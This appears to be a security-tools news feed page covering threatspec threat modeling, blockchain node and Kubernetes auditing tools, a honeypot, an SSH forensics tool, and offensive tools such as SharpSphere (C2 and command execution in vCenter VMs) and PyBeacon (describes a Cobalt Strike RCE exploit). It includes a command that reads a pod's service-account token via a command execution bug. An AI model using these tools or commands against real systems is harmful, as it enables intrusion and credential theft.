  • Generating it locally on your development machine as a sense-check after adding in new annotations
  • Automatically generating documentation and therefore the threat model report as part of a CI/CD pipeline
  • Prior to a team or multi-team threat modeling session
  • As part of an architecture review process
  • As input into an AppSec process such as internal pentesting or code review

The default report

The default report aims to provide a visual context as well as the details. It does this by generating a visualisation of the components, threats and controls in the form of a graph. It also provides tables of the threats, connections and reviews. This is all packaged up as a Markdown document. If you'd like to generate a PDF of the report, we suggest you use your browser's Print to PDF feature.


Other reports

There are a couple of other basic report formats supported by threatspec.


Text report

There is a basic text report which provides a summary as a basic ASCII text file.


JSON report

There is also a json report that will generate a single JSON file for all of the mitigations, exposures etc. and all of the threats, controls and components that are in scope. The source data files are merged together for simpler processing. For example, where an object originally referenced a control by its identifier, that key now points to a copy of the whole control object. This saves having to cross reference data.

You can use the JSON report file to create whatever custom visualisation or report as you see fit. Examples include:

  • Writing a script to parse the JSON file and insert the data into another data store (e.g. a database or JIRA)
  • Writing a simple CI/CD gate script that breaks the build under certain conditions like too many exposures
  • Building your own custom visualisation or reporting tool

Custom reports

The reporting system in threatspec uses the Python Jinja2 templating library. It also allows you to specify your own template file directly from the command line using the template output option. This allows you to easily create custom reports in whatever text format you need, without having to code something from scratch. The data that is made available to the template is the same as you get by running the json report, and it is passed in using the report variable. A very simple custom report might look like:

*******************************************************************************
{{ report.project.name }} Threat Model
*******************************************************************************

{{ report.project.description }}

See http://jinja.pocoo.org/ for more information on the Jinja2 templating library.


Annotations

Threatspec is based around annotating code with security related concepts. The code could be traditional application source code, but also Infrastructure-as-code. Comments are used at the point where the threat is most relevant, and by annotating the code you keep the threat model closest to the source - especially in a world of everything-as-code. This results in a living, evolving threat model document that plays well with existing software engineering practices such as Agile, Lean, code peer review, continuous testing and continuous deployment.


Threats

As you can imagine, a lot of threat modeling involves talking about threats. In the context of threat modeling, a threat is simply something that could go wrong. We typically focus on cyber security threats to technical systems, but not necessarily. In threatspec, a threat is basically just a string or an identifier to a string (see the Identifiers section below). Documented threats are stored in threat library JSON files and can be used across the code. In fact, it's sensible to build libraries of threats that can be shared across projects within your organisation, or even released as open source for others to use.

A threat in threat modeling isn't the same thing as a vulnerability. You cannot have a vulnerability in an application that only exists as a whiteboard drawing, but you can sensibly talk about possible threats to that application. Essentially, a vulnerability is a materialised threat. Threat modeling, and threatspec in particular, can help add context to other Application Security (AppSec) processes.


Controls

Threats are preferably mitigated in some way, and this typically involves implementing a technical control. Of course, in a threat modeling session, you'll probably be talking about which potential controls can be used to mitigate against different threats. As part of the general brainstorming process, you might want to capture a range of different possible controls of varying complexity and effectiveness. In threatspec, you might well be implementing a control in the code that you're writing, simply by following secure coding best practices. As for threats, controls are just strings to identifiers.


Components

Components are the basic building blocks of your application or service. Whether you're looking at things from an architecture perspective, or as a data flow, components are the different bits that are somehow related and connected. Threatspec doesn't require you to interpret components in any particular way, so a single threat model can combine a mixed of architectural components, data flow processes, even elements of a user interface.

Hierarchy is achieved by separating related components using the colon character (":"). You can nest however deeply you need, and components can appear at any point in any part of other hierarchy. It only really has to make sense in the context of your application or service, and organisation.

Here's what a typical web user interface component might look like: MyApp:Web:LoginForm. Within the MyApp application, we have a Web component that contains a LoginForm. See the examples below for many more examples.

There are two special components which are particularly useful for threat modeling APIs. One of the challenges of APIs and microservices is that you don't always know the full architecture in advance. The #server and #client special components let you refer to any current or future client of a server, without committing to the client being in any particular part of the architecture. For an example, see the "Transfers" section below.

Finally, components bring with them a challenge of identity. How do we know that the database component in MyApp:Product:Database is the same thing as the database component in MyApp:Users:Database? Threatspec assumes that they're different by default, because it generates a component ID using the full path. If they are in fact actually the same thing, you can state that by putting the primary component (the preferred way of referring to it) in parentheses after the alternative path. For example, MyApp:Product:Database and MyApp:Users:Database (MyApp:Product:Database) both refer to the same Database component.


Identifiers

Identifies are short-hand ways of referring to unique threats, components or controls (which we'll refer to as library objects). When parsing annotations, threatspec generates an ID for each new library object, and if the ID isn't known, it adds the new object to the respective library. You can also refer directly to the library object using the ID. To do this, you can specify an explicit ID by putting it in parentheses. For example, you can reference the threat SQL Injection (#sqli) simply as #sqli instead of SQL Injection.


Mitigates

A mitigation reduces the potential impact or likelihood of a threat to a component. This is generally implemented as a technical control. In threat modeling we can talk about potential mitigations against hypothetical threats, and in threat-modeling-as-code we can document specific coding practices, libraries or architecture decisions as mitigations against a particular threat. For example, you might mitigates against a SQL injection threat by using parameterised queries.

Pattern: @mitigates (?P<component>.*?) against (?P<threat>.*?) with (?P<control>.*)

Examples:

  • @mitigates MyApp:Web:Login against Cross-site Request Forgery with CSRF token generated provided by framework
  • @mitigates MyAPI:/ against DoS through excessive requests with use of a load balancer
  • @mitigates MyService:Crypto:Keys against weak key material with use of a secure random number generator (#PRNG)
// @mitigates WebApp:FileSystem against unauthorised access with strict file permissions
func (p *Page) save() error {
filename := p.Title + ".txt"
return ioutil.WriteFile(filename, p.Body, 0600)
}

Accepts

Some threats are perceived to be relatively insignificant and therefore don't really need to be mitigated. In this case you can accept the threat. You might choose to simply ignore the threat and not even document it, but it's still worth keeping a level of visibility for accepted threats. This is because a number of smaller seemingly insignificant threats can actually pose a significant compound threat, so making these visible in threat modeling sessions is always worth it. You can of course always accept even a significant threat, possibly due to feature delivery pressures, and keeping these visible helps to highlight the growing cyber security debt your application or service is carrying.

Pattern: @accepts (?P<threat>.*?) to (?P<component>.*?) with (?P<details>.*)

Examples:

  • @accepts file is read by system users to MyApp:Configuration with only admin users have system access
  • @accepts data breach of publicly available information to MyApp:AWS:S3:CustomerData with low chance of bucket is discovered by attacker
  • @accepts #api_info_diclosure to MyService:/api with version information isn't sensitive
// @accepts arbitrary file reads to WebApp:FileSystem with filename restrictions
func loadPage(title string) (*Page, error) {
filename := title + ".txt"
body, err := ioutil.ReadFile(filename)
if err != nil {
return nil, err
}
return &Page{Title: title, Body: body}, nil
}

Transfers

Threats can be transferred from one component to another, typically because the new component mitigates the threat in some way. A classic example of this would be transferring the threat of SQL injection from the web application to a Web Application Firewall (WAF). Technically the threat hasn't gone away, but the WAF is now responsible for mitigating it, and probably (hopefully?) does so using clever technology.

Another interesting use case for transfers is where a particular service component will do its job mitigating against certain threats, but isn't in a position to mitigate all threats. Some threats must be mitigated by users of the service. For example, a web service might securely store user credentials in the backend, but the user is also responsible for not disclosing their credentials. The threat of accidental exposure of credentials is mitigated by the service, but also transfer to the client.

Pattern: @transfers (?P<threat>.*?) from (?P<source_component>.*?) to (?P<destination_component>.*?) with (?P<details>.*)

Examples:

  • @transfers #sqli from MyApp:Web to #WAF with use of WAF data validation
  • @transfers auth token exposed from MyService:Auth:#server to MyService:Auth:#client with user must protect the auth token
  • @transfers sensitive data disclosure from MyApp:AWS:S3:Bucket to MyApp:AWS:BucketPolicy with use of bucket policy to restrict access
// @transfers @cwe_319_cleartext_transmission from WebApp:Web to User:Browser with non-sensitive information
func main() {
flag.Parse()
http.HandleFunc("/view/", makeHandler(viewHandler))
http.HandleFunc("/edit/", makeHandler(editHandler))
http.HandleFunc("/save/", makeHandler(saveHandler))

if *addr {
l, err := net.Listen("tcp", "127.0.0.1:0")

Exposes

If a threat isn't mitigated, transferred or accepted, it's basically left exposed. This should be the default state for new threats, until a decision has been made on what to do with them. Note that an exposed threat modeling threat doesn't necessarily equate to a vulnerability, but it highlights where you might expect to find them.

Pattern: @exposes (?P<component>.*?) to (?P<threat>.*?) with (?P<details>.*)

Examples:

  • @exposes Web:Form to #XSS with lack of input validation
  • @exposes MyService:Basket to price tampering with lack of backend validation
  • @exposes MyApp:CICD:Deployment to rogue code changes with lack of separation of duty
// @exposes WebApp:App to XSS injection with insufficient input validation
func editHandler(w http.ResponseWriter, r *http.Request, title string) {
p, err := loadPage(title)
if err != nil {
p = &Page{Title: title}
}
renderTemplate(w, "edit", p)
}

Connects

The relationship between components in a hierarchy are inferred from the component naming convention (see Components below). If you want to explicitly document connectivity between components, you can do this with the @connects tag. This allows you to draw architecture diagrams or data-flow diagrams, even before a single line of actual code has been written.

Pattern: @connects (?P<source_component>.*?) (?P<direction>with|to) (?P<destination_component>.*?) with (?P<details>.*)

Examples:

  • @connects User:Browser to MyApp:Web:Nginx with HTTPS/TCP/443
  • @connects MyService:Product:Search to MyService:Product:Basket with Add selected product to basket
  • @connects MyService:AWS:S3 with MyService:AWS:S3BucketPolicy with policy enforcement
// @connects User:Browser to MyService:Product:View with category
// @connects MyService:Product:View to MyService:Product:Search with search by category
// @connects MyService:Product:Search to MyService:Product:View list of products
// @connects MyService:Product:View to User:Browser with table of products by category

Tests

Identifying threats is great. Identifying mitigations against those threats is better. Implementing those mitigations is even better. Testing that those mitigations work, well that's just amazing. This action allows you to comment which unit or integration code is testing a particular control. This helps you to ensure the mitigations are working as expected and makes that visible in the threat model. These can also act as security regression tests, to prevent previously fixed threats returning. It's worth noting that writing tests which validate the control behaviour directly is great, but you might also want to consider how you could write offensive tests that fail as a result of the control. This can help bridge the gap where the control is working as expected, but where another factor has resurfaced the threat.

Pattern: @tests (?P<control>.*?) for (?P<component>.*)

Examples:

  • @tests CSRF Token for MyService:Web:Form
  • @tests Strict File Permissions for MyApp:Config
  • @tests #PRNG for Web:Auth
// @tests SecureRandom for App:Crypto:Certificates
def test_prng_entropy():
prng = crypto.SecureRandom()

Review

Threat modeling in code, especially unfamiliar code, can at times look a bit like a code review. If you're not the one who is writing or has written the code, questions may crop up that are worth flagging in a threat modeling session. You can use the @review tag to simply highlight a question or possible concern to be reviewed or discussed later.

Pattern: @review (?P<component>.*?) (?P<details>.*)

Examples:

  • @review Web:Form Shouldn't this mask passwords?
  • @review MyService:Auth this might not be a secure crypto algorithm in this situation
  • @review MyApp:Database Where do these credentials come from?
  // @review MyService:Web Shouldn't this be using TLS?
http.ListenAndServe(":8080", nil)


Teatime - An RPC Attack Framework For Blockchain Nodes

$
0
0


Teatime is an RPC attack framework aimed at making it easy to spot misconfigurations in blockchain nodes. It detects a large variety of issues, ranging from information leaks to open accounts, and configuration manipulation.

The goal is to enable tools scanning for vulnerable nodes and minimizing the risk of node-based attacks due to common vulnerabilities. Teatime uses a plugin-based architecture, so extending the library with your own checks is straightforward.

Please note that this library is still a PoC and lacks documentation. If there are plugins you would like to see, feel free to contact me on Twitter!


Installation

Teatime runs on Python 3.6+.

To get started, simply run

$ pip3 install teatime

Alternatively, clone the repository and run

$ pip3 install .

Or directly through Python's setuptools:

$ python3 setup.py install

Example

To get started, simply instantiate a Scanner class and pass in the target IP, port, node type, and a list of instantiated plugins. Consider the following sample to check whether a node is synced and mining:

from teatime.scanner import Scanner
from teatime.plugins.context import NodeType
from teatime.plugins.eth1 import NodeSync, MiningStatus

TARGET_IP = "127.0.0.1"
TARGET_PORT = 8545
INFURA_URL = "Infura API Endpoint"

def get_scanner():
return Scanner(
ip=TARGET_IP,
port=TARGET_PORT,
node_type=NodeType.GETH,
plugins=[
NodeSync(infura_url=INFURA_URL, block_threshold=10),
MiningStatus(should_mine=False)
]
)

if __name__ == '__main__':
scanner = get_scanner()
report = scanner.run()
print(report.to_dict())

Check out the examples directory for more small samples! Teatime is fully typed, so also feel free to explore options in your IDE if reading the documentation is not your preferred choice. :)


Future Development

The future of Teatime is uncertain, even though I would love to add broader checks that go beyond RPC interfaces, specifically for technologies such as:

  • Ethereum 2.0
  • Filecoin
  • IPFS

If you want to integrate plugins for smaller, less meaningful chains such as Bitcoin or Ethereum knock-offs, feel free to fork the project and integrate them separately.



SharpSphere - .NET Project For Attacking vCenter

$
0
0


SharpSphere gives red teamers the ability to easily interact with the guest operating systems of virtual machines managed by vCenter. It uses the vSphere Web Services API and exposes the following functions:

  • Command & Control - In combination with F-Secure's C3, SharpSphere provides C&C into VMs using VMware Tools, with no direct network connectivity to the target VM required.
  • Code Execution - Allows arbitrary commands to be executed in the guest OS and returns the result
  • File Upload - Allows arbitrary files to be uploaded to the guest OS
  • File Download - Allows arbitrary files to be downloaded from the guest OS
  • List VMs - Lists the VMs managed by vCenter that have VMware Tools running

SharpSphere supports execution through Cobalt Strike's execute-assembly.


Compilation

Compiled versions can be found here.

If you compile yourself you'll need to use ILMerge to combine SharpSphere.exe and CommandLine.dll in the Releases folder.


Usage

Available modules:

SharpSphere.exe help


list List all VMs managed by this vCenter

execute Execute given command in target VM

c2 Run C2 using C3's VMwareShareFile module

upload Upload file to target VM

download Download file from target VM

help Display more information on a specific command.

version Display version information.


List VMs:
SharpSphere.exe list --help 

--url Required. vCenter SDK URL, i.e. https://127.0.0.1/sdk

--username Required. vCenter username, i.e. administrator@vsphere.local

--password Required. vCenter password

Code execution:
SharpSphere.exe execute --help

--url Required. vCenter SDK URL, i.e. https://127.0.0.1/sdk

--username Required. vCenter username, i.e. administrator@vsphere.local

--password Required. vCenter password

--ip Required. Target VM IP address

--guestusername Required. Username used to authenticate to the guest OS

--guestpassword Required. Password used to authenticate to the guest OS

--command Required. Command to execute

--output (Default: false) Flag to receive the output. Will create a temporary file in C:\Users\Public on the
guest to save the output. This is then downloaded and printed to the console and the file deleted.

Command & Control:
SharpSphere.exe c2 --help

--url Required. vCenter SDK URL, i.e. https://127.0.0.1/sdk

--username Required. vCenter username, i.e. administrator@vsphere.local

--password Required. vCenter password

--ip Required. Target VM IP address

--guestusername Required. Username used to authenticate to the guest OS

--guestpassword Required. Password used to authenticate to the guest OS

--localdir Required. Full path to the C3 directory on this machine

--guestdir Required. Full path to the C3 directory on the guest OS

--inputid Required. Input ID configured for the C3 relay running on this machine

--outputid Required. Output ID configured for the C3 relay running on this machine

File Upload:
SharpSphere.exe upload --help

--url Required. vCenter SDK URL, i.e. https://127.0.0.1/sdk

--username Required. vCenter username, i.e. administrator@vsphere.local

--password Required. vCenter password

--ip Required. Target VM IP address

--guestusername Required. Username used to authenticate to the guest OS

--guestpassword Required. Password used to authenticate to the guest OS

--source Required. Full path to local file to upload

--destination Required. Full path to location where file should be uploaded

File Download:
>SharpSphere.exe download --help

--url Required. vCenter SDK URL, i.e. https://127.0.0.1/sdk

--username Required. vCenter username, i.e. administrator@vsphere.local

--password Required. vCenter password

--ip Required. Target VM IP address

--guestusername Required. Username used to authenticate to the guest OS

--guestpassword Required. Password used to authenticate to the guest OS

--source Required. Full path in the guest to the file to upload

--destination Required. Full path to the local directory where the file should be downloaded

Future Features
  1. Add support for Linux guest OS
  2. Include a --verbose option for listing VMs
  3. Add a --quiet flag to not mention every packet that's transferred
  4. Add a --testauth flag to confirm guest credentials are valid

Credit @jkcoote & @grzryc

Full walk-through and examples available here.




PyBeacon - A Collection Of Scripts For Dealing With Cobalt Strike Beacons In Python

$
0
0


PyBeacon is a collection of scripts for dealing with Cobalt Strike's encrypted traffic.

It can encrypt/decrypt beacon metadata, as well as parse symmetric encrypted taskings


Scripts included

There is a small library which includes encryption/decoding methods, however some example scripts are included.

  • stager-decode.py - this tool will simply decode a beacon DLL from a stager URL (you can use it to extract the public key).
  • register.py - this tool deals with RSA encrypted metadata and can register a new (fake) beacon on a target Teamserver.
  • tasktool.py - this tool deals with AES encrypted taskings to/from the teamserver. Use it to send callbacks to the teamserver, or for decoding taskings from a Teamserver to the beacon.
  • cs-3-5-rce.py - This is an implementation of the exploit used to exploit CS < 3.5-hf1, which was used in the wild to hack Cobalt Strike servers. It works by registering a beacon with a directory traversal in the IP address field. It then subsequently registers a download callback which causes the "download" to be uploaded anywhere on the target file system. The ITW exploit used a cronjob to achieve RCE.

TODO
  • Add more task types to the task decoding logic
  • Add decoding for beacon taskings. At the moment some "generic" logic is used, but it's not really helpful


CertEagle - Asset monitoring utility using real time CT log feeds

$
0
0


In Bugbounties “If you are not first , then you are last” there is no such thing as silver or a bronze medal , Recon plays a very crucial part and if you can detect/Identify a newly added asset earlier than others then the chances of you Finding/Reporting a security flaw on that asset and getting rewarded for the same are higher than others.

Personally I am monitoring CT logs for domains/subdomains for quite a long time now and it gave me a lot of successful results , The inspiration behind this was “Sublert : By yassineaboukir” which checks crt.sh for subdomains and can be executed periodically , However I am using somewhat different approach and instead of looking into crt.sh periodically, I am extracting domains from Live CT log feeds , So chances of me finding a new asset earlier is higher as compared to others.


Detailed Description about this can be found here :

Read Blog here : https://medium.com/@Asm0d3us/weaponizing-live-ct-logs-for-automated-monitoring-of-assets-39c6973177c7


Workflow
  • Monitoring Real Time CT log feed and extracting the domain names from that feed
  • Matching the extracted subdomains/domains against the domains/Keywords to be matched
  • Sending a Slack notification if a domain name matches

Requirements :
  • A VPS (UNIX up and running)
  • Python 3x (Tested with Python 3.6.9)
  • Slack Workspace (optional)

Setup

I am assuming that you have already done with your setup of slack workspace .

Now Create a channel named “subdomain-monitor” and set up a incoming webhook


Enabling Slack Notifications :

Edit config.yaml file and paste your slack webhook URL there , It should look something like this



Keywords and domains to match :

You can specify keywords and domains to match in domains.yaml file , You can specify names

For Matching subdomains :



Note : Notice that preceding dot [ . ]

Lets take “.facebook.com” as example , domains extracted from Real time CT logs will be matched against the word “.facebook.com” , if matched they will be logged in our output file (found-domains.log) . The thing to note here is , It will give some false positives like “test.facebook.com.test.com” , “example.facebook.company” but we can filter out them later on by using use regex magic


For Matching domains/subdomains with specific keywords :

Lets assume that you want to monitor and log domains/subdomains that are having word “hackerone” in them , then our domains.yaml file will look something like this 



Now all the extracted domains/subdomains that are having word “hackerone” in them will be matched and logged (and a slack notification will be sent to you for the same)

Okay we are done with our initial setup , Lets install the required dependencies and run our tool

$ pip3 install -r requirements.txt

$ python3 certeagle.py



Matched domains will look like this :


 

Slack Notifications will look like this :



Output files :

The program will keep on running all the matched domains will be saved under output directory in found-domains.log file



Strict Warning : Do not monitor assets of any organisation without prior consent


Inspiration

Sublert

Phishing Catcher


Contact

Shoot my DM : @0xAsm0d3us


#Offtopic but Important

This COVID pandemic affected animals too (in an indirect way) . I will be more than happy if you will show some love for Animals by donating to Animal Aid Unlimited ,Animal Aid Unlimited saves animals through street animal rescue, spay/neuter and education. Their mission is dedicated to the day when all living beings are treated with compassion and love.



Kubestriker - A Blazing Fast Security Auditing Tool For Kubernetes

$
0
0


Kubestriker performs numerous in depth checks on kubernetes infra to identify the security misconfigurations and challenges that devops engineers/developers are likely to encounter when using Kubernetes, especially in production and at scale.


kubestriker is Platform agnostic and works equally well across more than one platform such as self hostedkubernetes, Amazon EKS, Azure AKS, Google GKE etc.



How To Install

Clone the repo and install

To install this tool or clone and run this application, you'll need Git, python3 and pip installed on your computer. It is advised you install this tool in virtual environment

From your command line:

# Create python virtual environment
$ python3 -m venv env

# Activate python virtual environment
$ source env/bin/activate

# Clone this repository
$ git clone https://github.com/vchinnipilli/kubestriker.git

# Go into the repository
$ cd kubestriker

# Install dependencies
$ pip install -r requirements.txt

# Incase of prompt toolkit or selectmenu errors
$ pip install prompt-toolkit==1.0.15
$ pip install -r requirements.txt

# Gearing up Kubestriker
$ python -m kubestriker

# Result will be generated in the current working directory with the name of the target

Install using pip

To install and run this application, you'll need pip installed on your computer. From your command line:

# Create python virtual environment
$ python3 -m venv env

# Activate python virtual environment
$ source env/bin/activate

# Install using pip
$ pip install kubestriker

# Incase of prompt toolkit or selectmenu errors
$ pip install prompt-toolkit==1.0.15
$ pip install kubestriker

# Gearing up Kubestriker
$ python -m kubestriker

# Result will be generated in the current working directory with the name of the target

How to spin up kubestriker container

Use this link to view the Kubestriker container latest releases

# Spinning up the kubestriker Container
$ docker run -it --rm -v /Users/vasantchinnipilli/.kube/config:/root/.kube/config -v "$(pwd)":/kubestriker --name kubestriker cloudsecguy/kubestriker:v1.0.0

# Replace the user vasantchinnipilli above with your username or absolute path of kube config file
$ docker run -it --rm -v /Users/<yourusername>/.kube/config:/root/.kube/config -v "$(pwd)":/kubestriker --name kubestriker cloudsecguy/kubestriker:v1.0.0

# Gearing up Kubestriker
$ python -m kubestriker

# Result will be generated in the current working directory with the name of the target



Types of Scans

Authenticated scans

Authenticated scan expects the user to have atleast read-only privileges and provide a token during the scan. please use the below provided links to create read-only users

Create read-only user for Amazon eks
Create read-only user for Azure aks
Create read-only user for Google gke
Create a subject using Role based access control

# To grab a token from eks cluster
$ aws eks get-token --cluster-name cluster-name --region ap-southeast-2

# To grab a token from aks cluster
$ az aks get-credentials --resource-group myResourceGroup --name myAKSCluster

# To grab a token from gke cluster
$ gcloud container clusters get-credentials CLUSTER_NAME --zone=COMPUTE_ZONE

# To grab a token from service account
$ kubectl -n namespace get secret serviceaccount-token -o jsonpath='{.data.token}'

# To grab a token from a pod directly or via command execution bug
$ cat /run/secrets/kubernetes.io/serviceaccount/token

Unauthenticated scans

Unauthenticated scan will be successful incase of anonymous access is permitted on the target cluster


Identifying an open Insecure port on kubernetes master node



Identifying a worker Node with kubelet readwrite and readonly ports open



Current Capabilities
  • Scans Self Managed and cloud provider managed kubernetes infra
  • Reconnaissance phase checks for various services or open ports
  • Performs automated scans incase of insecure, readwrite or readonly services are enabled
  • Performs both authenticated scans and unauthenticated scans
  • Scans for wide range of IAM Misconfigurations in the cluster
  • Scans for wide range of Misconfigured containers
  • Scans for wide range of Misconfigured Pod Security Policies
  • Scans for wide range of Misconfigured Network policies
  • Scans the privileges of a subject in the cluster
  • Run commands on the containers and streams back the output
  • Provides the endpoints of the misconfigured services
  • Provides possible privilege escalation details
  • Elaborative report with detailed explanation

Future improvements
  • Automated exploitation based on the issues identified
  • api and cicd automation friendly
  • A Decent FrontEnd to make the lives easier

Suggestions

Kubestriker is an opensource and emailware. Meaning, if you liked using this tool or it has helped you in any way or if you have any suggestions/improvements, I'd like you send me an email at vchinnipilli@gmail.com about anything you'd want to say about this tool. I'd really appreciate it!


Support

vasant chinnipilli builds and maintains kubestriker to audit and secure kubernetes infrastructure.

Start with Documentation - will be available soon for quick tutorials and examples.

If you need direct support you can contact me at vchinnipilli@gmail.com.



uEmu - Tiny Cute Emulator Plugin For IDA Based On Unicorn.

$
0
0


uEmu is a tiny cute emulator plugin for IDA based on unicorn engine.

Supports following architectures out of the box: x86, x64, ARM, ARM64, MIPS, MIPS64


What is it GOOD for?
  • Emulate bare metal code (bootloaders, embeddedfirmware etc)
  • Emulate standalone functions

What is it BAD for?
  • Emulate complex OS code (dynamic libraries, processes etc)
  • Emulate code with many syscalls

What can be improved?
  • Find a way to emulate vendor specific register access (like MSR S3_x, X0 for ARM64)
  • Add more registers to track

Installation
  • brew install unicorn to install Unicorn binaries
  • pip install unicorn to install Unicorn python bindings
  • Use File / Script file... or ALT+F7 in IDA to load uEmu.py

Optionally uEmu can be loaded automatically as IDA plugin. In this case put it into [IDA]/Plugins folder and change USE_AS_SCRIPT to False inside uEmu.py

Note: on Windows you might need to add IDA Pro Qt5 path

import sys
sys.path.append('D:\\Soft\\IDA Pro 7.x\\python\\3\\PyQt5')


Chameleon - Customizable Honeypots For Monitoring Network Traffic, Bots Activities And Username\Password Credentials (DNS, HTTP Proxy, HTTP, HTTPS, SSH, POP3, IMAP, STMP, RDP, VNC, SMB, SOCKS5, Redis, TELNET, Postgres And MySQL)

$
0
0


Customizable honeypots for monitoring network traffic, bots activities and username\password credentials (DNS, HTTP Proxy, HTTP, HTTPS, SSH, POP3, IMAP, STMP, RDP, VNC, SMB, SOCKS5, Redis, TELNET and Postgres and MySQL)


Grafana Interface



NMAP Scan



Credentials Monitoring



General Features
  • Modular approach (honeypots run as scripts or imported as objects)
  • Most honeypots serve as servers (Only a few that emulate the application layer protocols)
  • Settings servers with username, password and banner (Default username and password are test)
  • ICMP, DNS TCP and UDP payloads are parsed and check against common patterns
  • Visualized Grafana interfaces for monitoring the results (Filter by IP - default is all)
  • Unstructured and structured logs are parsed and inserted into Postgres
  • All honeypots contain clients for testing the servers
  • All ports are opened and monitored by default
  • Easy automation and can be deployed on AWS ec2
  • & More features to Explore

Install and run

Docker stanalone simple
git clone https://github.com/qeeqbox/chameleon.git
cd chameleon
# choose which honeypot http, https, ssh etc and use -p in docker for the ports
docker build -t honeypot ./honeypot/. && docker run -p 9999:9999 -p 9998:9998 -it honeypot --mode normal --servers "ssh:9999 http:9998"

On ubuntu 18 or 19 System (Auto-configure)
git clone https://github.com/qeeqbox/chameleon.git
cd chameleon
chmod +x ./run.sh
./run.sh auto_configure

The Grafana interface http://localhost:3000 will open automatically after finishing the initialization process (username is changeme457f6460cb287 and passowrd is changemed23b8cc6a20e0)

Wait for a few seconds until honeypot shows the IP address

...
honeypot_1 | Your IP: 172.19.0.3
honeypot_1 | Your MAC: 09:45:aa:23:10:03
...

You can interact with the honeypot from your local system

ping 172.19.0.3
or run any network tool against it
nmap 172.19.0.3

On ubuntu 18 or 19 System (Auto-configure test)
git clone https://github.com/qeeqbox/chameleon.git
cd chameleon
chmod +x ./run.sh
./run.sh auto_test

The Grafana interface http://localhost:3000 will open automatically after finishing the initialization process (username is admin and passowrd is admin)


Or, import your desired non-blocking server as object (SSH Server)
copy ssh_server.py to your folder
# ip= String E.g. 0.0.0.0
# port= Int E.g. 9999
# username= String E.g. Test
# password= String E.g. Test
# mocking= Boolean or String E.g OpenSSH 7.0
# logs= String E.g db, terminal or all
# --------------------------------------------------------------------
# always remember to add process=true to run_server() for non-blocking

from ssh_server import QSSHServer
qsshserver = QSSHServer(port=9999)
qsshserver.run_server(process=True)
qsshserver.test_server(port=9999)
qsshserver.kill_server()
ssh test@127.0.0.1
INFO:chameleonlogger:['servers', {'status': 'success', 'username': 'test', 'ip': '127.0.0.1', 'server': 'ssh_server', 'action': 'login', 'password': 'test', 'port': 38696}]

Raspberry Pi 3B+ (setup zram first to avoid lockups)

Requirements (Servers only)
apt-get update -y && apt-get install -y iptables-persistent tcpdump nmap iputils-ping python python-pip python-psycopg2 lsof psmisc dnsutils
pip install scapy netifaces pyftpdlib sqlalchemy pyyaml paramiko==2.7.1 impacket twisted rdpy==1.3.2 psutil requests
pip install -U requests[socks]
pip install -Iv rsa==4.0

Current Servers/Emulators
  • DNS (Server using Twisted)
  • HTTP Proxy (Server using Twisted)
  • HTTP (Server using Twisted)
  • HTTPS (Server using Twisted)
  • SSH (Server using socket)
  • POP3 (Server using Twisted)
  • IMAP (Server using Twisted)
  • STMP (Server using smtpd)
  • RDP (Server using Twisted)
  • SMB (Server using impacket)
  • SOCK5 (Server using socketserver)
  • TELNET (Server using Twisted)
  • VNC (Emulator using Twisted)
  • Postgres (Emulator using Twisted)
  • Redis (Emulator using Twisted)
  • Mysql (Emulator using Twisted)
  • Elasticsearch (Coming..)
  • Oracle (Coming..)
  • ldap (maybe)

Changes
  • 2020.V.01.05 added mysql
  • 2020.V.01.04 added redis
  • 2020.V.01.03 switched ftp servers to twisted
  • 2020.V.01.02 switched http and https servers to twisted
  • 2020.V.01.02 Fixed changing ip in grafana interface

Roadmap
  • Refactoring logging
  • Fixing logger
  • Code Cleanup
  • Switching some servers to twisted
  • Adding graceful connection close (error response)
  • Implementing the rest of servers
  • Adding some detection logic to the sinffer
  • Adding a control panel

Resources

Twisted, documentation, Impacket, documentation, Grafana, documentation, Expert, Twisted, robertheaton


Other Licenses

By using this framework, you are accepting the license terms of all these packages: grafana, tcpdump, nmap, psycopg, dnsutils, scapy, netifaces, pyftpdlib, sqlalchemy, pyyaml, paramiko, impacket, rdpy, psutil, requests, FreeRDP, SMBClient, tigervnc


Articles

redteaming.netmy-infosec-awesome


Disclaimer\Notes
  • Do not deploy without proper configuration
  • Setup some security group rules and remove default credentials
  • Almost all servers and emulators are stripped-down - You can adjust that as needed
  • Please let me know if i missed a resource or dependency


packetStrider - A Network Packet Forensics Tool For SSH

$
0
0


packetStrider for SSH is a packet forensics tool that aims to provide valuable insight into the nature of SSH traffic, shining a light into the corners of SSH network traffic where golden nuggets of information previously lay in the dark.


The problem that packet strider aims to help with (AKA Why?)

SSH is obviously encrypted, yet valuable contextual information still exists within the network traffic that can go towards TTP's, intent, success and magnitude of actions on objectives. There may even exist situations where valuable context is not available or deleted from hosts, and so having an immutable and un-alterable passive network capture gives additional forensic context. "Packets don't lie".

Separately to the forensic context, packet strider predictions could also be used in an active fashion, for example to shun/RST forward connections if a tunneled reverse SSH session initiation feature is predicted within, even before reverse authentication is offered.


The broad techniques of packet strider (AKA How?)
  • Builds a rich feature set in the form of pandas dataframes. Over 40 features are engineered from packet metadata such as SSH Protocol message content, normalized statistics, direction, size, latency and sliding window features.
  • Strides through this feature set numerous times using sliding windows (Inspired by Convolutional Neural networks) to predict:
    • The use -R option in the forward session - this is what enables a Reverse connection to be made later in the session. This artefact is discovered very early in the session, directly after the forward session is authenticated. This is the first available warning sign that Reverse sessions are possible.
    • Initiation of the Reverse SSH session, this can occur at any point (early, or late) in the forward session. This is discovered prior to the Reverse session being authenticated successfully. This is the second warning sign, in that a reverse session has just been requested and setup for authentication.
    • Success and/or Failure of the Reverse session authentication. This is the third and final warning sign, after this point you know someone is on your host, inside a reverse session.
    • The use of the -A option (SSH Agent Forwarding), which enables the client to share it's local SSH private keys with the server. This functionality is generally considered dangerous. References: https://matrix.org/blog/2019/05/08/post-mortem-and-remediations-for-apr-11-security-incidenthttps://skylightcyber.com/2019/09/26/all-your-cloud-are-belong-to-us-cve-2019-12491/https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12491
    • All predictions and metadata reports on a stream by stream basis.
    • Human or scripted, based on timing deltas.
    • Is the server already known to the client? or was it the first time a connection between the two has been made. This is done through packet deltas associated with known_hosts.
    • Whether a client certificate or password auth was used, and if length of password is 8 chars or less.
    • keystrokes, delete key press, enter key presses (cut and paste and up/down is YMMV/experimental).
    • exfil/infil data movement predictions in both Forward and Reverse sessions.
    • Works on interactive sessions as well as file based ssh file transfer apps (eg scp, putty, cyberduck etc).

Getting started

Python3 has been used, and you will need the following modules (YMMV on python2)

pip3 install pandas matplotlib pyshark

Usage:

python3 packetStrider-ssh.py -h

Output:

